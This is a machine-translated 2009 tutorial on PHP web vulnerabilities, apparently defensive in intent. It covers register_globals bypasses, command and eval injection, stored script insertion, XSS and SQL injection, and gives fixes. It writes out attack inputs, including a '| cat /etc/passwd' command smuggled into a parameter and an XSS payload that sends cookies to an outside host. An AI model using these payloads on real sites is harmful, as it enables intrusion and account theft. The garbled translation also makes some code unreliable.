PHP vulnerability full solution-vulnerability warning-the black bar safety net

2009-11-29T00:00:00
ID MYHACK58:62200925441
Type myhack58
Reporter 佚名
Modified 2009-11-29T00:00:00

Description

PHP web page security issues For PHP website mainly exist the following types of attacks: 1. Command injection(Command Injection) 2. eval injection(Eval Injection) 3. Client scripting attacks(Script Insertion) 4. Cross-site scripting attacks(Cross Site Scripting, XSS) 5. SQL injectionattacks(SQL injection) 6. Cross-site request forgery attacks(Cross Site Request Forgeries, CSRF) 7. Session session hijacking(Session Hijacking) 8. Session fixation attacks(Session Fixation) 9. HTTP response splitting attacks(HTTP Response Splitting) 1 0. File upload vulnerability(File Upload Attack) 1 1. Directory traversal vulnerability(Directory Traversal) 1 2. Remote file inclusion attacks(for Remote Inclusion) 1 3. Dynamic function injection attack(Dynamic Variable Evaluation) 1 4. URL attack(URL attack) 1 5. Form submission spoofing attacks(Spoofed Form Submissions) 1 6. HTTP request spoofing attacks(Spoofed HTTP Requests)

Several important php. ini option Register Globals php>=4.2.0,php. ini the register_globals option the default value is preset to Off,when the register_globals setting is On,the program can receive from the server various environment variables,including the form submit variable,but because PHP does not have to previously initialize the value of a variable,thereby causing a great security risk. Example 1: //check_admin()is used to check current user permissions if the admin set the$is_admin variable is true,then the following determines the whether the variable is true,then perform the management of some operations //ex1.php <? php if (check_admin()) { $is_admin = true; } if ($is_admin) { do_something(); } ?& gt; This section of the code is not$is_admin in advance is initialized to Flase,if register_globals is On,then we directly submit <http://www.sectop.com/ex1.php?is_admin=true>,you can bypass the check_admin()validation

Example 2: //ex2.php <? php if (isset($_SESSION["username"])) { do_something(); } else { echo "You are not logged in!"; } ?& gt; When register_globals=On,we submitted to the<http://www.sectop.com/ex2.php?_SESSION>[username]=dodo,it has the user's permission So regardless of the register_globals why,we have to remember that,for any transmission of data to go through careful validation,the variable to be initialized

safe_mode Safe Mode,PHP is used to restrict document access. Limit the environment variables of access,control of the external program execution. To enable the security mode must be set php. ini safe_mode = On 1. Limit file access safe_mode_include_dir = "/path1:/path2:/path3" Different folders separated by a colon 2. Limit the environment variables to access the safe_mode_allowed_env_vars = string Specify the PHP program can change the environmental variable prefix,such as:safe_mode_allowed_env_vars = PHP_ ,when the value of this option is empty,then the php can change any environment variable safe_mode_protected_env_vars = string Used to specify the php program not changing the environment variable prefix 3. Limit external program execution safe_mode_exec_dir = string This option specifies the folder path to the affected system. exec. popen. passthru,does not affect the shell_exec and"". disable_functions = string Different function names separated by a comma,this option is not affected by the security modes and effects

magic quotes Used to allow the php program to input information to automatically escape all single quotes("'"),double quotes("""),backslash("\")and a null character(NULL),automatically is added a backslash to escape magic_quotes_gpc = On to set the magic quotes is On,it affects HTTP request data(GET. POST. Cookies) The programmer can also use addslashes to escape the submitted HTTP request data,or use stripslashes to remove the escaping

Command injection attacks In PHP you can use the following 5 a function to execute an external application or function system. exec. passthru. shell_exec.` (With shell_exec function the same) Function prototype string system(string command, int &return_var) command the command to be executed return_var storage to execute the command after the execution of the state value string exec (string command, array &output, int &return_var) command the command to be executed output get command execution output each line of the string return_var stored after executing the command the status value void passthru (string command, int &return_var) command the command to be executed return_var stored after executing the command the status value string shell_exec (string command) command the command to be executed

Vulnerability instance Example 1: //ex1.php <? php $dir = $_GET["dir"]; if (isset($dir)) { echo "<pre>"; system("ls-al ".$ dir); echo "</pre>"; } ?& gt; We submit the<http://www.sectop.com/ex1.php?dir=>| cat /etc/passwd After submission,the command into a system("ls-al | cat /etc/passwd");

eval injection attack the eval function converts the input string parameter as PHP code to execute Function prototype: mixed eval(string code_str) //eval injected generally occurs when the attacker can control the input of the string when //ex2.php <? php $var = "var"; if (isset($_GET["arg"])) { $arg = $_GET["arg"]; eval("\$var = $arg;"); echo "\$var =".$ var; } ?& gt; When we submit the <http://www.sectop.com/ex2.php?arg=phpinfo>();the vulnerability it creates. Dynamic function <? php func A() { dosomething(); } func B() { dosomething(); } if (isset($_GET["func"])) { $myfunc = $_GET["func"]; echo $myfunc(); } ?& gt; Programmer intent is want to live call the A and B functions,that we submitted to the<http://www.sectop.com/ex.php?func=phpinfo> vulnerability generated

Prevention methods 1. Try not to execute an external command 2. Use a custom function or a function library instead of the external command function 3. Use the escapeshellarg function to handle command parameters 4. Use safe_mode_exec_dir to specify the path to the executable esacpeshellarg function will be any caused by the parameters or commands to the end of the escape character,single quotes"'",replaced with"\'",double quote""",replace"\"",semicolon";"is replaced with"\;" Use safe_mode_exec_dir to specify the path to the executable,you can put the use of the command in advance of put into this path safe_mode = On safe_mode_exec_di r= /usr/local/php/bin/

The client script of the implant The client script of the implant(Script Insertion),refers to the will can be executed the script is inserted into the form. Pictures. Animation or hyperlink text within the object. When the user opens these objects,an attacker of the implant of the script will be executed,and then begins to attack. Can be used as a script implanted in the HTML tags generally include the following: 1.& lt;script>tag labelNote the javascript and vbscript, etc. page of the script program. In the<script>tag you can specify a js program code,also can be in a src attribute within the specified js file URL path 2.& lt;object>tag and the object. These objects are the java applet. Multimedia files and ActiveX controls etc. Usually in the data properties within the specified object's URL path 3.& lt;embed>tag and the object. These objects are multimedia files,such as swf files. Usually in the src attribute of the specified object's URL path 4.& lt;applet>tag and the object. These objects is a java applet,usually in the codebase attribute within the object specified in the URL path 5.& lt;form>tag and the object. Usually in the action attribute is specified to handle form data to the web application URL path

The client script of the implant of the attack step 1. An attacker to register an ordinary user after logged in to the website 2. Open the message page,insert the attack of the js code 3. Other users login to the website(including the administrator),browse the message content 4. Hidden in the message content of the js code is executed,the attack is successful Examples Database Create TABLE postmessage ( id int(1 1) NOT NULL auto_increment, subject varchar(6 0) NOT NULL default ", name varchar(4 0) NOT NULL default ", email varchar(2 5) NOT NULL default ", question mediumtext NOT NULL, postdate datetime NOT NULL default '0000-00-00 0 0:0 0:0 0', PRIMARY KEY (id) ) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT='user comment' AUTO_INCREMENT=6 9 ; //add.php insert the message //list.php message list //show.php display message Browse this message when executing js scripts Insert <script>while(1){windows. open();}</script> unlimited shells box Insert<script>location. href="http://www.sectop.com";</script> jump fishing page Or use the other to construct their own js code to attack

Prevention method Generally use the htmlspecialchars function to convert special characters into HTML encoded Function prototype string htmlspecialchars (string string, int quote_style, string charset) string to encoded string quote_style optional,value can be ENT_COMPAT ENT_QUOTES ENT_NOQUOTES,the default ENT_COMPAT,represents only convert double quotes does not convert single quotes. ENT_QUOTES,represents the double quotation marks and single quotation marks are to be converted. ENT_NOQUOTES,represents the double quotation marks and single quotation marks are not converted the charset is optional,indicates the character set used The function will be the following special characters converted into html coding: & ----> & "---->" '---->' < ----> < > ----> > The show. php 9 line 8 into the <? php echo htmlspecialchars(nl2br($row['question']), ENT_QUOTES); ?& gt; Then view insert the js vulnerability page xsscross-site scripting attacks XSS(Cross Site Scripting),is intended for cross-site scripting attacks,in order to and style sheet css(Cascading Style Sheet)is the difference,abbreviated asXSS Cross-site scripting mainly be exploited by attackers to read the web site user's cookies or other personal data,once the attacker obtained these data,then he can masquerade as this user to log in to a website,to get this user's permissions. Cross-site scripting attacks generally the steps of: 1. The attacker somehow sendxssthe http link to the target user 2. The target user log on to this website,in the landing during the opening of the attackers sent byxsslink 3. Website do thisxssthe attack script 4. The target user of the page to jump to the attacker website,the attacker to obtain the target user's information 5. The attacker uses the target user's login information website,complete the attack When there is the presence of cross-site vulnerability of the program occurs,the attacker can construct a similar <http://www.sectop.com/search.php?>

key=<script>document. location='<http://www.hack.com/getcookie.php?>

cookie='+document. cookie;</script> ,to trick users into clicking on the post,the user can obtain cookies value Prevention methods: The use of htmlspecialchars function the special characters into HTML encoded Function prototype string htmlspecialchars (string string, int quote_style, string charset) string to encoded string quote_style optional,value can be ENT_COMPAT AND ENT_QUOTES, AND ENT_NOQUOTES,the default ENT_COMPAT,represents only convert double quotes not

Converted single quotes. ENT_QUOTES,represents the double quotation marks and single quotation marks are to be converted. ENT_NOQUOTES,represents the double quotation marks and single quotation marks are not converted the charset is optional,indicates the character set used The function will be the following special characters converted into html coding: & ----> & "---->" '---->' < ----> < > ----> >

$_SERVER["PHP_SELF"]variable span Station

In a form,if the Submit parameter to ourselves,with such statements <form action="<? php echo $_SERVER["PHP_SELF"];?& gt;" method="POST"> ...... </form> $_SERVER["PHP_SELF"]variable value for the current page name Example: <http://www.sectop.com/get.php> get. php above the form Then we submit <http://www.sectop.com/get.php>/"><script>alert(document. cookie);</script> Then form into <form action="get.php/"><script>alert(document. cookie);</script>" method="POST"> Cross-site scripting is inserted to the Defense method or use htmlspecialchars to filter the output of the variable,or to submit to its own file of the forms used <form action="" method="post"> So directly to avoid$_SERVER["PHP_SELF"]variable is cross-site

SQL injectionattack SQL injectionattacks(SQL Injection),is the attacker in the form submit carefully constructed sql statement,change the original sql statement,if the web program does not have to submit the data through the check,then it will causesql injectionattack. SQL injectionattack the General steps: 1. The attacker has accessSQL injectionthe vulnerability of the website,look for the injection point 2. Attacker construction injection statements,into statements and procedures in SQL statements combined to generate a new sql statement 3. The new sql statement is submitted to the database for processing 4. Database implementation of a new SQL statement,triggerSQL injectionattack